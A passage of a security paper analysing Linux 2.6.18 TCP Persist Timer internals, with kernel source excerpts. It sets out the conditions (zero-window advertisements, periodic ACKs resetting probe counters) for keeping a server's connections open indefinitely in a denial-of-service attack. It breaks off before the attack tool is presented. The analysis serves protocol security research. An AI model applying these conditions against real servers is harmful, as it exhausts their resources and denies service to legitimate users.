|=-----------------------------------------------------------------------=|
|=--------=[ Exploiting TCP and the Persist Timer Infiniteness ]=--------=|
|=-----------------------------------------------------------------------=|
|=---------------=[    By ithilgore                      ]=--------------=|
|=---------------=[       sock-raw.org                   ]=--------------=|
|=---------------=[                                      ]=--------------=|
|=---------------=[    ithilgore.ryu.L@gmail.com         ]=--------------=|
|=-----------------------------------------------------------------------=|


---[ Contents

   1 - Introduction

   2 - TCP Persist Timer Theory

   3 - TCP Persist Timer implementation 
     3.1 - TCP Timers Initialization
     3.2 - Persist Timer Triggering
     3.3 - Inner workings of Persist Timer

   4 - The attack
     4.1 - Kernel memory exhaustion pitfalls
     4.2 - Attack Vector
     4.3 - Test cases

   5 - Nkiller2 implementation

   6 - References
  
  
--[ 1 - Introduction 

TCP is the main protocol upon which most end-to-end communications take
place nowadays. It was introduced many years ago, when security was not
as much of a concern, and that has left it with quite a few lingering
vulnerabilities. It is not strange that many TCP implementations have
deviated from the official RFCs to provide additional protective
measures and robustness. However, there are still attack vectors which
can be exploited. One of them is the Persist Timer, which is triggered
when the receiver advertises a TCP window of size 0. In the following
text, we are going to analyse how an old technique of kernel memory
exhaustion [1] can be amplified, extended and adjusted to other forms of
attacks by exploiting the persist timer functionality. Our analysis is
mainly going to focus on the Linux (2.6.18) network stack implementation,
but test cases for *BSD will be included as well. The possibility of
exploiting the TCP Persist Timer was first mentioned in [2].
A proof-of-concept tool that was developed for the sole purpose of
demonstrating the above attack will be presented. Nkiller2 is able to 
perform a generic DoS attack, completely statelessly and with almost no 
memory overhead, using packet-parsing techniques and virtual states. In
addition, the amount of traffic created is far less than that of similar
tools, due to the attack's nature. The main advantage, that makes all the
difference, is the possibly unlimited prolonging of the DoS attack's
impact by the exploitation of a perfectly 'expected & normal' TCP Persist
Timer behaviour.


--[ 2 - TCP Persist Timer theory 

TCP is based on many timers. One of them is the Persist Timer, which is
used when the peer advertises a window of size 0. Normally, the receiver
advertises a zero window, when TCP hasn't pushed the buffered data to the
user application and thus the kernel buffers reach their initial
advertised limit. This forces the TCP sender to stop writing data to the
network, until the receiver advertises a window which has a value greater
than zero. To accomplish that, the receiver sends an ACK called a window
update, which has the same acknowledgment number as the one that
advertised the 0 window (since no new data is effectively acknowledged).

The Persist Timer is triggered when TCP gets a 0 window advertisement for
the following reason: Suppose the receiver eventually pushes the data
from the kernel buffers to the user application, and thus opens the
window (the right edge is advanced). It then sends a window update to the
sender, announcing that it can now receive new data. If this window
update is lost for any reason, both ends of the connection would
deadlock, since the receiver would wait for new data and the sender would
wait for the now lost window update. To avoid this situation, the sender
sets the Persist Timer and, if no window update has reached it by the
time the timer expires, it sends a probe to the peer. As long as the
receiver keeps advertising a window of size 0, the sender repeats the
process: it sets the timer, waits for the window update and resends the
probe. As long as some of the probes are acknowledged, without
necessarily having to announce a new window, the process will go on ad
infinitum. Examples can be found at [3].

Of course, the actual implementation is always more complicated than
theory. We are going to inspect the Linux implementation of the
TCP Persist Timer, watch the intricacies unfold and eventually get a
fairly good perspective on what happens behind the scenes.


--[ 3 - TCP Persist Timer implementation

The following code inspection will mainly focus on the implementation of 
the TCP Persist Timer on Linux 2.6.18. Many of the TCP kernel functions 
will be regarded as black-boxes, as their analysis is beyond the scope of
this paper and would probably require a book by itself. 


----[ 3.1 - TCP Timer Initialization

Let's see when and how the main TCP timers are initialized. During the
socket creation process tcp_v4_init_sock() will call 
tcp_init_xmit_timers() which in turn calls inet_csk_init_xmit_timers().


net/ipv4/tcp_ipv4.c:
/---------------------------------------------------------------------\

/* NOTE: A lot of things set to zero explicitly by call to
 *       sk_alloc() so need not be done here.
 */
static int tcp_v4_init_sock(struct sock *sk)
{
    struct inet_connection_sock *icsk = inet_csk(sk);
    struct tcp_sock *tp = tcp_sk(sk);

    skb_queue_head_init(&tp->out_of_order_queue);
    tcp_init_xmit_timers(sk);
    /* ... */

}

\---------------------------------------------------------------------/


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

void tcp_init_xmit_timers(struct sock *sk)
{
    inet_csk_init_xmit_timers(sk, &tcp_write_timer, &tcp_delack_timer,
                  &tcp_keepalive_timer);
}

\---------------------------------------------------------------------/


As we can see, inet_csk_init_xmit_timers() is the function which actually
does the work of setting up the timers. Essentially, it assigns a handler
function to each of the three main timers, as instructed by its
arguments. setup_timer() is a simple inline function defined in
"include/linux/timer.h".


net/ipv4/inet_connection_sock.c:
/---------------------------------------------------------------------\

/*
 * Using different timers for retransmit, delayed acks and probes
 * We may wish use just one timer maintaining a list of expire jiffies
 * to optimize.
 */
void inet_csk_init_xmit_timers(struct sock *sk,
                   void (*retransmit_handler)(unsigned long),
                   void (*delack_handler)(unsigned long),
                   void (*keepalive_handler)(unsigned long))
{
    struct inet_connection_sock *icsk = inet_csk(sk);

    setup_timer(&icsk->icsk_retransmit_timer, retransmit_handler,
            (unsigned long)sk);
    setup_timer(&icsk->icsk_delack_timer, delack_handler,
            (unsigned long)sk);
    setup_timer(&sk->sk_timer, keepalive_handler, (unsigned long)sk);
    icsk->icsk_pending = icsk->icsk_ack.pending = 0;
}

\---------------------------------------------------------------------/


include/linux/timer.h:
/---------------------------------------------------------------------\

static inline void setup_timer(struct timer_list * timer,
                void (*function)(unsigned long),
                unsigned long data)
{
    timer->function = function;
    timer->data = data;
    init_timer(timer);
}

\---------------------------------------------------------------------/


According to the above, the timers will be initialized with the following
handlers:

retransmission timer -> tcp_write_timer()
delayed acknowledgments timer -> tcp_delack_timer()
keepalive timer -> tcp_keepalive_timer()

What interests us is tcp_write_timer(), since, as we can see from the
following code, *both* the retransmission timer *and* the persist timer
are initially handled by the same function before triggering the more
specific ones. There is a reason why Linux ties the two timers together.


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

static void tcp_write_timer(unsigned long data)
{
    struct sock *sk = (struct sock*)data;
    struct inet_connection_sock *icsk = inet_csk(sk);
    int event;

    bh_lock_sock(sk);
    if (sock_owned_by_user(sk)) {
        /* Try again later */
        sk_reset_timer(sk, &icsk->icsk_retransmit_timer, 
            jiffies + (HZ / 20));
        goto out_unlock;
    }

    if (sk->sk_state == TCP_CLOSE || !icsk->icsk_pending)
        goto out;

    if (time_after(icsk->icsk_timeout, jiffies)) {
        sk_reset_timer(sk, &icsk->icsk_retransmit_timer, 
            icsk->icsk_timeout);
        goto out;
    }

    event = icsk->icsk_pending;
    icsk->icsk_pending = 0;

    switch (event) {
    case ICSK_TIME_RETRANS:
        tcp_retransmit_timer(sk);
        break;
    case ICSK_TIME_PROBE0:
        tcp_probe_timer(sk);
        break;
    }
    TCP_CHECK_TIMER(sk);

out:
    sk_mem_reclaim(sk);
out_unlock:
    bh_unlock_sock(sk);
    sock_put(sk);
}

\---------------------------------------------------------------------/


Depending on the value of 'icsk->icsk_pending', either the retransmission
timer's real handler, tcp_retransmit_timer(), or the persist timer's real
handler, tcp_probe_timer(), is called. ICSK_TIME_RETRANS and
ICSK_TIME_PROBE0 are constants defined in
"include/net/inet_connection_sock.h", and icsk_pending is an 8-bit member
of struct inet_connection_sock, which is defined in the same file.


include/net/inet_connection_sock.h:
/---------------------------------------------------------------------\

/** inet_connection_sock - INET connection oriented sock
 *
 * @icsk_pending:      Scheduled timer event
 * ...
 *
 */

struct inet_connection_sock {
    /* inet_sock has to be the first member! */
    struct inet_sock      icsk_inet;
    /* ... */
    __u8              icsk_pending;

    /* ...*/
};

/* ... */

#define ICSK_TIME_RETRANS   1   /* Retransmit timer */
#define ICSK_TIME_DACK      2   /* Delayed ack timer */
#define ICSK_TIME_PROBE0    3   /* Zero window probe timer */
#define ICSK_TIME_KEEPOPEN  4   /* Keepalive timer */

\----------------------------------------------------------------------/


Leaving the initialization process behind, we need to see how we can
trigger the TCP persist timer.


----[ 3.2 - Persist Timer Triggering

Looking through the kernel code for functions that trigger/reset the 
timers, we fall upon inet_csk_reset_xmit_timer() which is defined at
"include/net/inet_connection_sock.h"


include/net/inet_connection_sock.h:
/---------------------------------------------------------------------\

/*
 *  Reset the retransmission timer
 */
static inline void inet_csk_reset_xmit_timer(struct sock *sk,
                         const int what,
                         unsigned long when,
                         const unsigned long max_when)
{
    struct inet_connection_sock *icsk = inet_csk(sk);

    if (when > max_when) {
#ifdef INET_CSK_DEBUG
        pr_debug("reset_xmit_timer: sk=%p %d when=0x%lx, "
            "caller=%p\n", sk, what, when,
            current_text_addr());
#endif
        when = max_when;
    }

    if (what == ICSK_TIME_RETRANS || what == ICSK_TIME_PROBE0) {
        icsk->icsk_pending = what;
        icsk->icsk_timeout = jiffies + when;
        sk_reset_timer(sk, &icsk->icsk_retransmit_timer,
                icsk->icsk_timeout);
    } else if (what == ICSK_TIME_DACK) {
        icsk->icsk_ack.pending |= ICSK_ACK_TIMER;
        icsk->icsk_ack.timeout = jiffies + when;
        sk_reset_timer(sk, &icsk->icsk_delack_timer, 
                icsk->icsk_ack.timeout);
    }
#ifdef INET_CSK_DEBUG
    else {
        pr_debug("%s", inet_csk_timer_bug_msg);
    }
#endif
}

\----------------------------------------------------------------------/


An assignment to 'icsk->icsk_pending' is made according to the argument
'what'. Note the ambiguity of the comment, which mentions only that the
retransmission timer is reset. In fact, either the persist timer or the
retransmission timer can be reset through this function. In addition,
the delayed acknowledgement timer, which won't interest us, can be reset
through the ICSK_TIME_DACK value. So, whenever
inet_csk_reset_xmit_timer() is called, it sets the corresponding timer,
as instructed by argument 'what', to fire after time 'when' has passed
(a 'when' larger than 'max_when' is clamped to 'max_when'). jiffies is a
global variable which holds the number of clock ticks since the system
booted. A good reference on how timers in general are managed is [4].
A caller function which sets the argument 'what' to ICSK_TIME_PROBE0 is
tcp_check_probe_timer().


include/net/tcp.h:
/---------------------------------------------------------------------\

static inline void tcp_check_probe_timer(struct sock *sk, 
                        struct tcp_sock *tp)
{
    const struct inet_connection_sock *icsk = inet_csk(sk);
    if (!tp->packets_out && !icsk->icsk_pending)
        inet_csk_reset_xmit_timer(sk, ICSK_TIME_PROBE0,
                      icsk->icsk_rto, TCP_RTO_MAX);
}

\----------------------------------------------------------------------/


We face two problems before the persist timer can be triggered. First we
need to pass the check of the if condition in tcp_check_probe_timer():

    if (!tp->packets_out && !icsk->icsk_pending)

tp->packets_out denotes whether any packets are in flight and have not
yet been acknowledged. This means that the advertisement of a 0 window
must happen after any data we have received has been acknowledged by us
(as the receiver) and before the sender starts transmitting any new data.
The requirement that icsk->icsk_pending be 0 means that any other timer
must already have been cleared. This can happen through the function
inet_csk_clear_xmit_timer(), which in our case can be called by
tcp_ack_packets_out(), which is called by tcp_clean_rtx_queue(), which is
called by tcp_ack(), the main function that deals with incoming ACKs.
tcp_ack() is called by tcp_rcv_established(), in turn called by
tcp_v4_do_rcv(). Again, the only condition for tcp_ack_packets_out() to
call the timer clearing function is that 'tp->packets_out' be 0.


include/net/inet_connection_sock.h:
/---------------------------------------------------------------------\

static inline void inet_csk_clear_xmit_timer(struct sock *sk, 
                        const int what)
{
    struct inet_connection_sock *icsk = inet_csk(sk);
    
    if (what == ICSK_TIME_RETRANS || what == ICSK_TIME_PROBE0) {
        icsk->icsk_pending = 0;
#ifdef INET_CSK_CLEAR_TIMERS
        sk_stop_timer(sk, &icsk->icsk_retransmit_timer);
#endif
    }
    /* ... */
}

\----------------------------------------------------------------------/


net/ipv4/tcp_input.c:
/---------------------------------------------------------------------\

static void tcp_ack_packets_out(struct sock *sk, struct tcp_sock *tp)
{
    if (!tp->packets_out) {
        inet_csk_clear_xmit_timer(sk, ICSK_TIME_RETRANS);
    } else {
        inet_csk_reset_xmit_timer(sk, ICSK_TIME_RETRANS, 
            inet_csk(sk)->icsk_rto, TCP_RTO_MAX);
    }
}

/* ... */

/* Remove acknowledged frames from the retransmission queue. */
static int tcp_clean_rtx_queue(struct sock *sk, __s32 *seq_rtt_p)
{

/* ... */
    if (acked&FLAG_ACKED) {
        tcp_ack_update_rtt(sk, acked, seq_rtt);
        tcp_ack_packets_out(sk, tp);
        /* ... */
    }
/* ... */

}

/* ... */

/* This routine deals with incoming acks, but not outgoing ones. */
static int tcp_ack(struct sock *sk, struct sk_buff *skb, int flag)
{

/* ... */

    /* See if we can take anything off of the retransmit queue. */
    flag |= tcp_clean_rtx_queue(sk, &seq_rtt);
/* ... */

}

\----------------------------------------------------------------------/


The only caller of tcp_check_probe_timer() is __tcp_push_pending_frames(),
which has tcp_push_pending_frames() as its wrapper function.
tcp_push_pending_frames() is called by tcp_data_snd_check(), which is
called by tcp_rcv_established(), which as we saw above calls tcp_ack() as
well.


include/net/tcp.h:
/---------------------------------------------------------------------\

void __tcp_push_pending_frames(struct sock *sk, struct tcp_sock *tp,
                   unsigned int cur_mss, int nonagle)
{
    struct sk_buff *skb = sk->sk_send_head;

    if (skb) {
        if (tcp_write_xmit(sk, cur_mss, nonagle))
            tcp_check_probe_timer(sk, tp);
    }
}

/* ... */

static inline void tcp_push_pending_frames(struct sock *sk,
                       struct tcp_sock *tp)
{
    __tcp_push_pending_frames(sk, tp, tcp_current_mss(sk, 1),
                    tp->nonagle);
}

\----------------------------------------------------------------------/


Another problem here is that we have to make tcp_write_xmit() return a
nonzero value. According to the comments and the last line of the
function, the only way to return 1 is to have no unacknowledged packets
in flight and, additionally, to have more packets queued for sending.
This means that the data we request needs to be larger than the initial
MSS, so that at least 2 packets are needed to send it. The first will be
acknowledged by us, advertising a zero window at the same time, and
after that there will still be at least 1 packet left in the sender's
queue. There is also the option of advertising a zero window before the
sender even starts sending any data, just after the connection
establishment phase, but we will see later that this is not really good
practice.


net/ipv4/tcp_output.c:
/---------------------------------------------------------------------\

/* This routine writes packets to the network.  It advances the
 * send_head.  This happens as incoming acks open up the remote
 * window for us.
 *
 * Returns 1, if no segments are in flight and we have queued segments,
 * but cannot send anything now because of SWS or another problem.
 */
static int tcp_write_xmit(struct sock *sk, unsigned int mss_now, 
                int nonagle)
{
    struct tcp_sock *tp = tcp_sk(sk);
    struct sk_buff *skb;
    unsigned int tso_segs, sent_pkts;
    int cwnd_quota;
    int result;

    /* If we are closed, the bytes will have to remain here.
     * In time closedown will finish, we empty the write queue and
     * all will be happy.
     */
    if (unlikely(sk->sk_state == TCP_CLOSE))
        return 0;

    sent_pkts = 0;

    /* Do MTU probing. */
    if ((result = tcp_mtu_probe(sk)) == 0) {
        return 0;
    } else if (result > 0) {
        sent_pkts = 1;
    }

    while ((skb = sk->sk_send_head)) {
        unsigned int limit;

        tso_segs = tcp_init_tso_segs(sk, skb, mss_now);
        BUG_ON(!tso_segs);

        cwnd_quota = tcp_cwnd_test(tp, skb);
        if (!cwnd_quota)
            break;

        if (unlikely(!tcp_snd_wnd_test(tp, skb, mss_now)))
            break;

        if (tso_segs == 1) {
            if (unlikely(!tcp_nagle_test(tp, skb, mss_now,
                (tcp_skb_is_last(sk, skb) ?
                nonagle : TCP_NAGLE_PUSH))))
                break;
        } else {
            if (tcp_tso_should_defer(sk, tp, skb))
                break;
        }

        limit = mss_now;
        if (tso_segs > 1) {
            limit = tcp_window_allows(tp, skb,
                          mss_now, cwnd_quota);

            if (skb->len < limit) {
                unsigned int trim = skb->len % mss_now;

                if (trim)
                    limit = skb->len - trim;
            }
        }

        if (skb->len > limit &&
            unlikely(tso_fragment(sk, skb, limit, mss_now)))
            break;

        TCP_SKB_CB(skb)->when = tcp_time_stamp;

        if (unlikely(tcp_transmit_skb(sk, skb, 1, GFP_ATOMIC)))
            break;

        /* Advance the send_head.  This one is sent out.
         * This call will increment packets_out.
         */
        update_send_head(sk, tp, skb);

        tcp_minshall_update(tp, mss_now, skb);
        sent_pkts++;
    }

    if (likely(sent_pkts)) {
        tcp_cwnd_validate(sk, tp);
        return 0;
    }
    return !tp->packets_out && sk->sk_send_head;
}

\----------------------------------------------------------------------/


Looking through tcp_write_xmit(), we can deduce that the only way to make
it return a nonzero value is by reaching the last line and at the same
time meeting the above two requirements. Consequently, we need to break
out of the while loop before 'sent_pkts' is incremented, so that the if
condition which calls tcp_cwnd_validate() and then causes the function
to return 0 fails the check. The key is these two lines:

        if (unlikely(!tcp_snd_wnd_test(tp, skb, mss_now)))
            break;

tcp_snd_wnd_test() is defined as follows:

net/ipv4/tcp_output.c:
/---------------------------------------------------------------------\

/* Does at least the first segment of SKB fit into the send window? */
static inline int tcp_snd_wnd_test(struct tcp_sock *tp, 
    struct sk_buff *skb, unsigned int cur_mss)
{
    u32 end_seq = TCP_SKB_CB(skb)->end_seq;

    if (skb->len > cur_mss)
        end_seq = TCP_SKB_CB(skb)->seq + cur_mss;

    return !after(end_seq, tp->snd_una + tp->snd_wnd);
}

\---------------------------------------------------------------------/


To clarify a few things, here is an excerpt from tcp.h which defines the
macro 'after' and the members of struct tcp_skb_cb which are used inside
tcp_snd_wnd_test(). 


include/net/tcp.h:
/---------------------------------------------------------------------\

/*
 * The next routines deal with comparing 32 bit unsigned ints
 * and worry about wraparound (automatic with unsigned arithmetic).
 */

static inline int before(__u32 seq1, __u32 seq2)
{
        return (__s32)(seq1-seq2) < 0;
}
#define after(seq2, seq1)   before(seq1, seq2)

/* ... */

struct tcp_skb_cb {
    union {
        struct inet_skb_parm    h4;
#if defined(CONFIG_IPV6) || defined (CONFIG_IPV6_MODULE)
        struct inet6_skb_parm   h6;
#endif
    } header;   /* For incoming frames      */
    __u32       seq;        /* Starting sequence number */
    __u32       end_seq;    /* SEQ + FIN + SYN + datalen    */
    
    /* ... */

    __u32       ack_seq;    /* Sequence number ACK'd    */
};

#define TCP_SKB_CB(__skb)   ((struct tcp_skb_cb *)&((__skb)->cb[0]))

\---------------------------------------------------------------------/


So, in theory we need the segment's end sequence number (its starting
sequence number plus the data length, capped at one MSS) to lie beyond
the sum of the oldest unacknowledged sequence number (snd_una) and the
send window (snd_wnd). A diagram from RFC 793 helps clear things up:

                   1         2          3          4      
              ----------|----------|----------|---------- 
                     SND.UNA    SND.NXT    SND.UNA        
                                          +SND.WND        

        1 - old sequence numbers which have been acknowledged  
        2 - sequence numbers of unacknowledged data            
        3 - sequence numbers allowed for new data transmission 
        4 - future sequence numbers which are not yet allowed  

In practice, the fact that we, as receivers, just advertised a window of
size 0 makes snd_wnd 0, so tcp_snd_wnd_test() returns 0 and the loop
breaks as required. Things just work by themselves here.

For completeness, we mention that the window is updated by calling the
function tcp_ack_update_window() (caller is tcp_ack()), which in turn
updates the tp->snd_wnd variable if the window update is a valid one,
something which is checked by tcp_may_update_window().


net/ipv4/tcp_input.c:
/---------------------------------------------------------------------\

/* Check that window update is acceptable.
 * The function assumes that snd_una<=ack<=snd_next.
 */
static inline int tcp_may_update_window(const struct tcp_sock *tp, 
    const u32 ack, const u32 ack_seq, const u32 nwin)
{
    return (after(ack, tp->snd_una) ||
        after(ack_seq, tp->snd_wl1) ||
        (ack_seq == tp->snd_wl1 && nwin > tp->snd_wnd));
}

/* ... */

/* Update our send window.
 *
 * Window update algorithm, described in RFC793/RFC1122 (used in 
 * linux-2.2 and in FreeBSD. NetBSD's one is even worse.) is wrong.
 */
static int tcp_ack_update_window(struct sock *sk, struct tcp_sock *tp,
                 struct sk_buff *skb, u32 ack, 
                 u32 ack_seq)
{
    int flag = 0;
    u32 nwin = ntohs(skb->h.th->window);

    if (likely(!skb->h.th->syn))
        nwin <<= tp->rx_opt.snd_wscale;

    if (tcp_may_update_window(tp, ack, ack_seq, nwin)) {
        flag |= FLAG_WIN_UPDATE;
        tcp_update_wl(tp, ack, ack_seq);

        if (tp->snd_wnd != nwin) {
            tp->snd_wnd = nwin;
            /* ... */
        }
    }

    tp->snd_una = ack;

    return flag;
}

\---------------------------------------------------------------------/


Let's now summarize the above with a graphical representation.

attacker <-------- data --------- sender
attacker ---- ACK(data), win0 --> sender

What happens on the sender side:

tcp_v4_do_rcv()
   |
   |--> tcp_rcv_established()
          |
          |--> tcp_ack()
          |       |
          |       |--> tcp_ack_update_window() 
          |       |      | 
          |       |      |--> tcp_may_update_window()
          |       |      
          |       |--> tcp_clean_rtx_queue() 
          |              |
          |              |--> tcp_ack_packets_out()
          |                      |
          |                      |--> inet_csk_clear_xmit_timer()
          |         
          |--> tcp_data_snd_check()
                  |
                  |--> tcp_push_pending_frames()
                         |
                         |--> __tcp_push_pending_frames()
                                 |
                                 |--> tcp_write_xmit()
                                 |      |
                                 |      |--> tcp_snd_wnd_test()
                                 |               
                                 |--> tcp_check_probe_timer()
                                        |
                                        |--> inet_csk_reset_xmit_timer()


Time to move on to the more specific internals of the TCP Persist Timer
itself.


----[ 3.3 - Inner workings of Persist Timer

tcp_probe_timer() is the actual handler for the TCP persist timer so we
are going to focus on this one for a while.


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

static void tcp_probe_timer(struct sock *sk)
{
    struct inet_connection_sock *icsk = inet_csk(sk);
    struct tcp_sock *tp = tcp_sk(sk);
    int max_probes;

    if (tp->packets_out || !sk->sk_send_head) {
        icsk->icsk_probes_out = 0;
        return;
    }

    /* *WARNING* RFC 1122 forbids this
     *
     * It doesn't AFAIK, because we kill the retransmit timer -AK
     *
     * FIXME: We ought not to do it, Solaris 2.5 actually has fixing
     * this behaviour in Solaris down as a bug fix. [AC]
     *
     * Let me to explain. icsk_probes_out is zeroed by incoming ACKs
     * even if they advertise zero window. Hence, connection is killed
     * only if we received no ACKs for normal connection timeout. It is
     * not killed only because window stays zero for some time, window
     * may be zero until armageddon and even later. We are in full
     * accordance with RFCs, only probe timer combines both
     * retransmission timeout and probe timeout in one bottle.  --ANK
     */
    max_probes = sysctl_tcp_retries2;

    if (sock_flag(sk, SOCK_DEAD)) {
        const int alive = ((icsk->icsk_rto << icsk->icsk_backoff)
            < TCP_RTO_MAX);
 
        max_probes = tcp_orphan_retries(sk, alive);

        if (tcp_out_of_resources(sk, alive || icsk->icsk_probes_out
            <= max_probes))
            return;
    }

    if (icsk->icsk_probes_out > max_probes) {
        tcp_write_err(sk);
    } else {
        /* Only send another probe if we didn't close things up. */
        tcp_send_probe0(sk);
    }
}

\---------------------------------------------------------------------/


Commenting on the comments, we stand before a kernel developer
disagreement on whether or not the implementation deviates from RFC 1122
(Requirements for Internet Hosts - Communication Layers). The most 
outstanding point, however, is this remark:

    "It is not killed only because window stays zero for some time, 
    window may be zero until armageddon and even later."

Indeed, this is part of what we are going to exploit. We shall take
advantage of a perfectly 'normal' TCP behaviour, for our own purpose.
Let's see how this works: 'max_probes' is assigned the value of
'sysctl_tcp_retries2' which is actually a userspace-controlled variable
from /proc/sys/net/ipv4/tcp_retries2 and which usually defaults to 15.

There are two cases from now on.
First case: SOCK_DEAD -> The socket is "dead" or "orphan" which usually
happens when the state of the connection is FIN_WAIT_1 or any other 
terminating state from the TCP state transition diagram (RFC 793).
In this case, 'max_probes' gets the value from tcp_orphan_retries() which
is defined as follows:


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

/* Calculate maximal number or retries on an orphaned socket. */
static int tcp_orphan_retries(struct sock *sk, int alive)
{
    int retries = sysctl_tcp_orphan_retries; /* May be zero. */

    /* We know from an ICMP that something is wrong. */
    if (sk->sk_err_soft && !alive)
        retries = 0;

    /* However, if socket sent something recently, select some safe
     * number of retries. 8 corresponds to >100 seconds with minimal
     * RTO of 200msec. */
    if (retries == 0 && alive)
        retries = 8;
    return retries;
}

\---------------------------------------------------------------------/


The 'alive' variable is calculated from this line:

        const int alive = ((icsk->icsk_rto << icsk->icsk_backoff)
            < TCP_RTO_MAX);

TCP_RTO_MAX is the maximum value the retransmission timeout can get
and is defined at:


include/net/tcp.h:
/---------------------------------------------------------------------\

#define TCP_RTO_MAX ((unsigned)(120*HZ))

\---------------------------------------------------------------------/


HZ is the tick rate of the system, which means a tick period of 1/HZ
seconds. Regardless of the value of HZ (which varies from one
architecture to another), a number of seconds multiplied by HZ gives the
equivalent number of ticks [4]. For example, 120*HZ ticks amount to 120
seconds, since we are going to have HZ timer interrupts per second.

Consequently, if the backed-off retransmission timeout is less than the
maximum allowed value of 2 minutes, then 'alive' = 1 and
tcp_orphan_retries() will return 8 when sysctl_tcp_orphan_retries is 0
(which is usually the case, as one can see from the proc virtual
filesystem: /proc/sys/net/ipv4/tcp_orphan_retries). Keep in mind,
however, that the RTO (retransmission timeout) is a dynamically computed
value, varying when, for example, traffic congestion occurs.

In practice, a socket typically becomes dead when the user application
has been asked for a small amount of data by the peer. It can then write
the data all at once and issue a close(2) on the socket. This will result
in a transition from TCP_ESTABLISHED to TCP_FIN_WAIT1. Normally, and
according to RFC 793, entering FIN_WAIT_1 involves sending a FIN (doing
an active close) to the peer. However, Linux breaks the official TCP
state machine and will queue this small amount of data, sending the FIN
only when all of it has been acknowledged.


net/ipv4/tcp.c:
/---------------------------------------------------------------------\

void tcp_close(struct sock *sk, long timeout)
{
/* ... */
        
        /* RED-PEN. Formally speaking, we have broken TCP state
         * machine. State transitions:
         *
         * TCP_ESTABLISHED -> TCP_FIN_WAIT1
         * TCP_SYN_RECV -> TCP_FIN_WAIT1 (forget it, it's impossible)
         * TCP_CLOSE_WAIT -> TCP_LAST_ACK
         *
         * are legal only when FIN has been sent (i.e. in window),
         * rather than queued out of window. Purists blame.
         *
         * F.e. "RFC state" is ESTABLISHED,
         * if Linux state is FIN-WAIT-1, but FIN is still not sent.
         * ...
         */
/* ... */
}

\---------------------------------------------------------------------/


Second Case: socket not dead -> in this case 'max_probes' keeps having
the default value from 'tcp_retries2'. 

'icsk->icsk_probes_out' stores the number of zero window probes sent so
far. Its value is compared to 'max_probes' and, if greater,
tcp_write_err() is called, which will shut down the corresponding socket
(TCP_CLOSE state). If not, a zero window probe is sent with
tcp_send_probe0().

    if (icsk->icsk_probes_out > max_probes) {
        tcp_write_err(sk);
    } else {
        /* Only send another probe if we didn't close things up. */
        tcp_send_probe0(sk);
    }

One important factor here is the 'icsk_probes_out' "regeneration" which
takes place whenever we send an ACK, regardless of whether this ACK
opens the window or keeps it zero. tcp_ack() from tcp_input.c has a 
line which assigns 0 to 'icsk_probes_out': 

    no_queue:
        icsk->icsk_probes_out = 0;


We mentioned earlier that the TCP Retransmission Timer functionality is
loosely tied to the Persist Timer. Indeed, the connecting "circle" between
them is the 'tcp_retries2' variable. Also, remember the comment from
above:

    /* ...
     * We are in full accordance with RFCs, only probe timer combines both
     * retransmission timeout and probe timeout in one bottle.  --ANK
     */

tcp_retransmit_timer() calls tcp_write_timeout() as part of its checking
procedures, which in turn follows a logic similar to the one we saw above
in the Persist Timer paradigm. We can see that 'tcp_retries2' plays a
major role here, too. 


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

/*
 *  The TCP retransmit timer.
 */

static void tcp_retransmit_timer(struct sock *sk)
{
/* ... */
    if (tcp_write_timeout(sk))
        goto out;
/* ... */
}

/* ... */

/* A write timeout has occurred. Process the after effects. */
static int tcp_write_timeout(struct sock *sk)
{
    /* ... */

    } else {
        /* ... */

        retry_until = sysctl_tcp_retries2;
        if (sock_flag(sk, SOCK_DEAD)) {
            const int alive = (icsk->icsk_rto < TCP_RTO_MAX);

            retry_until = tcp_orphan_retries(sk, alive);

            if (tcp_out_of_resources(sk, alive || icsk->icsk_retransmits
                    < retry_until))
                return 1;
        }
    }

    if (icsk->icsk_retransmits >= retry_until) {
        /* Has it gone just too far? */
        tcp_write_err(sk);
        return 1;
    }
    /* ... */
}

\---------------------------------------------------------------------/


The idea of combining the two timer algorithms is also mentioned in RFC
1122. Specifically, Section 4.2.2.17 - Probing Zero Windows states:

    "This procedure minimizes delay if the zero-window condition is due
    to a lost ACK segment containing a window-opening update. Exponential
    backoff is recommended, possibly with some maximum interval not
    specified here. This procedure is similar to that of the
    retransmission algorithm, and it may be possible to combine the two
    procedures in the implementation."

In addition, both OpenBSD and FreeBSD combine the two timeouts in a
similar way. We can see this from the code excerpt below (OpenBSD
4.4).


sys/netinet/tcp_timer.c:
/---------------------------------------------------------------------\

void
tcp_timer_persist(void *arg)
{
    struct tcpcb *tp = arg;
    uint32_t rto;
    int s;

    s = splsoftnet();
    if ((tp->t_flags & TF_DEAD) ||
            TCP_TIMER_ISARMED(tp, TCPT_REXMT)) {
        splx(s);
        return;
    }
    tcpstat.tcps_persisttimeo++;
    /*
     * Hack: if the peer is dead/unreachable, we do not
     * time out if the window is closed.  After a full
     * backoff, drop the connection if the idle time
     * (no responses to probes) reaches the maximum
     * backoff that we would use if retransmitting.
     */
    rto = TCP_REXMTVAL(tp);
    if (rto < tp->t_rttmin)
        rto = tp->t_rttmin;
    if (tp->t_rxtshift == TCP_MAXRXTSHIFT &&
        ((tcp_now - tp->t_rcvtime) >= tcp_maxpersistidle ||
        (tcp_now - tp->t_rcvtime) >= rto * tcp_totbackoff)) {
        tcpstat.tcps_persistdrop++;
        tp = tcp_drop(tp, ETIMEDOUT);
        goto out;
    }
    tcp_setpersist(tp);
    tp->t_force = 1;
    (void) tcp_output(tp);
    tp->t_force = 0;
 out:
    splx(s);
}

\---------------------------------------------------------------------/


This of course doesn't mean that the timers are connected in any other
way. In fact, they are mutually exclusive, as when one of them is set
the other is cleared.

Summing up, to successfully trigger and later exploit the Persist Timer
the following prerequisites need to be met:

a) The amount of data requested needs to be big enough so that the 
userspace application cannot write the data all at once and issue a
close(2), thus going into FIN_WAIT_1 state and marking the socket as
SOCK_DEAD.

b) Assuming the default value of 'tcp_retries2', we need to send an ACK
(still advertising a 0 window though) at least once within every 15
persist timer probes. This is frequent enough to reset 'icsk_probes_out'
back to zero and thus avoid the tcp_write_err() pitfall.

c) The zero window advertisement will have to take place immediately
after acknowledging all the data in transit. This, of course, may include
piggybacking the ACK of the data, with the window advertisement.
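
Prerequisite 'b' can be illustrated with a small userspace simulation. It
is only a sketch of the counter logic discussed above: MAX_PROBES = 15 is
the assumed default of 'tcp_retries2', and simulate_probes() is a
hypothetical helper, not something taken from the kernel or from
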